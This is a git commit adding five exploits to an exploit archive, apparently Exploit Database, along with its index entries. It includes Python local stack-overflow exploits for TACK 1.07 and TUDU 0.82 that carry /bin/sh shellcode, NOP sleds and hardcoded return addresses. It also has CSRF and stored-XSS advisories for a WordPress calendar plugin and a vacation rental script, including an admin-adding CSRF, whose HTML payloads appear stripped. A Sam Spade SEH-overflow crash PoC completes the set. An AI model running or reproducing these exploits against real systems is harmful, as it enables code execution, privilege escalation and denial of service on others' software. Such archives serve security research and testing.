From 4ab205abc3ddc2e2a1f5f40e472a292899fb00c9 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 13 Nov 2015 05:03:26 +0000 Subject: [PATCH] DB: 2015-11-13 5 new exploits --- files.csv | 5 + platforms/linux/local/38685.py | 48 ++++++++ platforms/linux/local/38686.py | 48 ++++++++ platforms/php/webapps/38648.txt | 48 ++++++++ platforms/php/webapps/38684.txt | 189 ++++++++++++++++++++++++++++++++ platforms/windows/dos/38687.py | 32 ++++++ 6 files changed, 370 insertions(+) create mode 100755 platforms/linux/local/38685.py create mode 100755 platforms/linux/local/38686.py create mode 100755 platforms/php/webapps/38648.txt create mode 100755 platforms/php/webapps/38684.txt create mode 100755 platforms/windows/dos/38687.py diff --git a/files.csv b/files.csv index a81b0f566..9532521ed 100755 --- a/files.csv +++ b/files.csv @@ -34921,6 +34921,7 @@ id,file,description,date,author,platform,type,port 38641,platforms/multiple/webapps/38641.rb,"JSSE SKIP-TLS Exploit",2015-11-05,"Ramon de C Valle",multiple,webapps,0 38643,platforms/php/webapps/38643.txt,"WordPress Pie Register Plugin 'wp-login.php' Multiple Cross Site Scripting Vulnerabilities",2013-07-12,gravitylover,php,webapps,0 38646,platforms/jsp/webapps/38646.txt,"NXFilter 3.0.3 - Multiple XSS Vulnerabilities",2015-11-06,hyp3rlinx,jsp,webapps,0 +38648,platforms/php/webapps/38648.txt,"WordPress My Calendar Plugin 2.4.10 - Multiple Vulnerabilities",2015-11-06,Mysticism,php,webapps,0 38649,platforms/php/webapps/38649.txt,"Google AdWords API PHP client library <= 6.2.0 - Arbitrary PHP Code Execution",2015-11-07,"Dawid Golunski",php,webapps,0 38650,platforms/windows/dos/38650.py,"QNap QVR Client 5.1.0.11290 - Crash PoC",2015-11-07,"Luis Martínez",windows,dos,0 38651,platforms/php/webapps/38651.txt,"eBay Magento CE <= 1.9.2.1 - Unrestricted Cron Script (Potential Code Execution / DoS)",2015-11-07,"Dawid Golunski",php,webapps,0 @@ -34941,6 +34942,7 @@ id,file,description,date,author,platform,type,port 38667,platforms/windows/remote/38667.py,"ReadyMedia Remote Heap Buffer Overflow Vulnerability",2013-07-15,"Zachary Cutlip",windows,remote,0 38668,platforms/windows/local/38668.c,"Cisco WebEx One-Click Client Password Encryption Information Disclosure Vulnerability",2013-07-09,"Brad Antoniewicz",windows,local,0 38669,platforms/multiple/remote/38669.txt,"MongoDB 'conn' Mongo Object Remote Code Execution Vulnerability",2013-06-04,"SCRT Security",multiple,remote,0 +38684,platforms/php/webapps/38684.txt,"R-Scripts Vacation Rental Script 7R - Multiple Vulnerabilities",2015-11-12,LiquidWorm,php,webapps,0 38671,platforms/hardware/remote/38671.txt,"Barracuda CudaTel Multiple Cross-Site Scripting Vulnerabilities",2013-07-17,"Benjamin Kunz Mejri",hardware,remote,0 38672,platforms/windows/local/38672.txt,"YardRadius Multiple Local Format String Vulnerabilities",2013-06-30,"Hamid Zamani",windows,local,0 38673,platforms/php/webapps/38673.txt,"Collabtive Multiple Security Vulnerabilities",2013-07-22,"Enrico Cinquini",php,webapps,0 @@ -34954,3 +34956,6 @@ id,file,description,date,author,platform,type,port 38681,platforms/linux/local/38681.py,"FBZX 2.10 - Local Stack-Based Buffer Overflow",2015-11-11,"Juan Sacco",linux,local,0 38682,platforms/php/webapps/38682.txt,"Jahia xCM /engines/manager.jsp site Parameter XSS",2013-07-31,"High-Tech Bridge",php,webapps,0 38683,platforms/php/webapps/38683.txt,"Jahia xCM /administration/ Multiple Parameter XSS",2013-07-31,"High-Tech Bridge",php,webapps,0 +38685,platforms/linux/local/38685.py,"TACK 1.07 - Local Stack-Based Buffer Overflow",2015-11-12,"Juan Sacco",linux,local,0 +38686,platforms/linux/local/38686.py,"TUDU 0.82 - Local Stack-Based Buffer Overflow",2015-11-12,"Juan Sacco",linux,local,0 +38687,platforms/windows/dos/38687.py,"Sam Spade 1.14 - S-Lang Command Field SEH Overflow",2015-11-12,"Nipun Jaswal",windows,dos,0 diff --git a/platforms/linux/local/38685.py b/platforms/linux/local/38685.py new file mode 100755 index 000000000..b13c68c99 --- /dev/null +++ b/platforms/linux/local/38685.py @@ -0,0 +1,48 @@ +# Exploit Author: Juan Sacco - http://www.exploitpack.com +# Program: tack - Terminal action checker +# Tested on: GNU/Linux - Kali Linux 2.0 x86 +# +# Description: TACK v1.07 and prior is prone to a stack-based buffer overflow +# vulnerability because the application fails to perform adequate +# boundary-checks on user-supplied input. +# +# An attacker could exploit this issue to execute arbitrary code in the +# context of the application. Failed exploit attempts will result in a +# denial-of-service condition. +# +# Vendor homepage: *http://www.z nyx.com * +# Kali Linux 2.0 package: pool/main/t/tack/tack_1.07-1_amd64.deb +# MD5: 0fc1d2e9c374c1156b2b02186a9f8980 + +import os,subprocess +def run(): + try: + print "# TACK v1.07 Stack-Based Overflow by Juan Sacco" + print "# It's Fuzzing time on unusable exploits" + print "# This exploit is for educational purposes only" + # Basic structure: JUNK + SHELLCODE + NOPS + EIP + + junk = "\x41"*10 + shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" + nops = "\x90"*3022 + eip = "\x30\xd1\xff\xbf" + subprocess.call(["tack",' ', junk + shellcode + nops + eip]) + + except OSError as e: + if e.errno == os.errno.ENOENT: + print "TACK not found!" + else: + print "Error executing exploit" + raise + +def howtousage(): + print "Sorry, something went wrong" + sys.exit(-1) + +if __name__ == '__main__': + try: + print "Exploit TACK 1.07 Local Overflow Exploit" + print "Author: Juan Sacco" + except IndexError: + howtousage() +run() diff --git a/platforms/linux/local/38686.py b/platforms/linux/local/38686.py new file mode 100755 index 000000000..ce34c8bb4 --- /dev/null +++ b/platforms/linux/local/38686.py @@ -0,0 +1,48 @@ +# Exploit Author: Juan Sacco - http://www.exploitpack.com +# Program: tudu - Command line hierarchical ToDo list +# Tested on: GNU/Linux - Kali Linux 2.0 x86 +# +# Description: TUDU v0.82 and prior is prone to a stack-based buffer overflow +# vulnerability because the application fails to perform adequate +# boundary-checks on user-supplied input. +# +# An attacker could exploit this issue to execute arbitrary code in the +# context of the application. Failed exploit attempts will result in a +# denial-of-service condition. +# +# Vendor homepage: http://www.cauterized.net/~meskio/tudu +# Kali Linux 2.0 package: pool/main/t/tudu/tudu_0.8.2-1.deb +# MD5: 1dc2s2e9c374c9876b2b02283a9f5243 + +import os,subprocess +def run(): + try: + print "# TUDU v0.82 Stack-Based Overflow by Juan Sacco" + print "# It's Fuzzing time on unusable exploits" + print "# This exploit is for educational purposes only" + # Basic structure: JUNK + SHELLCODE + NOPS + EIP + + junk = "\x41"*10 + shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" + nops = "\x90"*124 + eip = "\x60\xd3\xff\xbf" + subprocess.call(["tack",' ', junk + shellcode + nops + eip]) + + except OSError as e: + if e.errno == os.errno.ENOENT: + print "TUDU not found!" + else: + print "Error executing exploit" + raise + +def howtousage(): + print "Sorry, something went wrong" + sys.exit(-1) + +if __name__ == '__main__': + try: + print "Exploit TUDU 0.82 Local Overflow Exploit" + print "Author: Juan Sacco" + except IndexError: + howtousage() +run() diff --git a/platforms/php/webapps/38648.txt b/platforms/php/webapps/38648.txt new file mode 100755 index 000000000..0f88dc996 --- /dev/null +++ b/platforms/php/webapps/38648.txt @@ -0,0 +1,48 @@ +Exploit TItle: My Calendar 2.4.10 CSRF and XSS +Exploit Author : Mysticism (Ahn Sung Jun) +Date : 2015-11-06 +Vendor Homepage : http://wordpress.org/plugins/my-calendar +Software Link : https://downloads.wordpress.org/plugin/my-calendar.2.4.10.zip +Version : 2.4.10 +Tested On : kail linux Iceweasel + + +=================== +Vulnerable Code : my-calendar-categoris.php +if ( isset( $_POST['mode'] ) && $_POST['mode'] == 'add' ) { + $term = wp_insert_term( $_POST['category_name'], 'mc-event-category' ); + if ( ! is_wp_error( $term ) ) { + $term = $term['term_id']; + } else { + $term = false; + } + $add = array( + 'category_name' => $_POST['category_name'], + 'category_color' => $_POST['category_color'], + 'category_icon' => $_POST['category_icon'], + 'category_private' => ( ( isset( $_POST['category_private'] ) ) ? 1 : 0 ), + 'category_term' => $term + ); + } + + +POC (CSRF & XSS) + + + +
+ + + + + + + + + +
+ + + +Discovered By +Mysticism(Ahn Sung Jun) \ No newline at end of file diff --git a/platforms/php/webapps/38684.txt b/platforms/php/webapps/38684.txt new file mode 100755 index 000000000..c765645d2 --- /dev/null +++ b/platforms/php/webapps/38684.txt @@ -0,0 +1,189 @@ + +R-Scripts VRS 7R Multiple Stored XSS And CSRF Vulnerabilities + + +Vendor: R-Scripts +Product web page: http://www.r-scripts.com +Affected version: 7R + +Summary: PHP Vacation Rental Script is the best solution +for your vacation rentals online business. + +Desc: The application allows users to perform certain actions +via HTTP requests without performing any validity checks +to verify the requests. This can be exploited to perform +certain actions with administrative privileges if a logged-in +user visits a malicious web site. Stored cross-site scripting +vulnerabilitity was also discovered. The issue is triggered +when input passed via multiple POST parameters is not properly +sanitized before being returned to the user. This can be +exploited to execute arbitrary HTML and script code in a +user's browser session in context of an affected site. + +Tested on: Apache/2.2.29 + PHP/5.3.29 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2015-5274 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5274.php + + +01.10.2015 + +-- + + +CSRF Add Admin: +--------------- + + + +
+ + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + +Privilege Escalation: +--------------------- + + + +
+ + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + +Stored XSS: +----------- + + + +
+ + + + + + + + + + + + + + + + + + +
+ + + + +Stored XSS: +----------- + + + +
+ + + + + + + + + + + + + + + + + + + + +
+ + + +Stored XSS: +----------- + + + +
+ + + + + + + + + + + + +
+ + diff --git a/platforms/windows/dos/38687.py b/platforms/windows/dos/38687.py new file mode 100755 index 000000000..b0e77b765 --- /dev/null +++ b/platforms/windows/dos/38687.py @@ -0,0 +1,32 @@ +#!/usr/bin/env python +# Exploit Title : Sam Spade 1.14 S-Lang Command Field SEH Overflow Crash PoC +# Discovery by : Nipun Jaswal +# Email : mail@nipunjaswal.info +# Discovery Date : 12/11/2015 +# Vendor Homepage : http://samspade.org +# Software Link : http://www.majorgeeks.com/files/details/sam_spade.html +# Tested Version : 1.14 +# Vulnerability Type: Denial of Service (DoS) Local +# Tested on OS : Windows XP Professional SP2 x86 es +# Crash Point : Go to Tools > S-Lang Command> Enter the contents of 'sam_spade_slang_dos.txt' > OK , Note: Do Not Remove the round bracket +########################################################################################## +# -----------------------------------NOTES----------------------------------------------# +########################################################################################## +# And the Stack +#00FBFE80 41414141 AAAA +#00FBFE84 41414141 AAAA +#00FBFE88 42424242 BBBB Pointer to next SEH record +#00FBFE8C 43434343 CCCC SE handler + +# After the execution of POC, the SEH chain looks like this: +#Address SE handler +#00FBFE88 43434343 +#42424242 *** CORRUPT ENTRY *** + +f = open("sam_spade_slang_dos.txt", "w") +Junk_a = "A"*528 +nseh= "B" * 4 +seh= "C" *4 + +f.write(Junk_a+nseh+seh) +f.close() \ No newline at end of file